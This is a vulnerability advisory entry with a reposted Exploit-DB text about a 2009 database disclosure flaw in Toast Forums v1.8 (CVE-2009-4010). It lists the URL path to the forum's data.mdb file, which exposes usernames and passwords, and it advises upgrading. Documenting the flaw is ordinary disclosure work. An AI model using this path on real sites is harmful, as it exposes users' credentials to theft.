Toast Forums v1.8 Database Disclosure Vulnerability

vendor:

Toast Forums

by:

ViRuSMaN

8.8

CVSS

HIGH

Database Disclosure

200

CWE

Product Name: Toast Forums

Affected Version From: 1.8

Affected Version To: 1.8

Patch Exists: YES

Related CWE: CVE-2009-4010

CPE: a:toastforums:toast_forums:1.8

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/

Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=50549

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Toast Forums v1.8 Database Disclosure Vulnerability

Toast Forums v1.8 is vulnerable to a database disclosure vulnerability. An attacker can access the database file (data.mdb) which contains sensitive information such as usernames, passwords, and other data.

Mitigation:

Upgrade to the latest version of Toast Forums.

Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|


==============================================================================
        [»] ~ Note : Thx 2 Egyptian National Team
==============================================================================
        [»] Toast Forums v1.8 Database Disclosure Vulnerability
==============================================================================

    [»] Script:             [ Toast Forums v1.8 ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Toast Forums World's first user-skinnable message board! ]
    [»] Download:           [ http://www.toastforums.com/download/ ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://[target].com/[path]/data/data.mdb



Author: ViRuSMaN <-

###########################################################################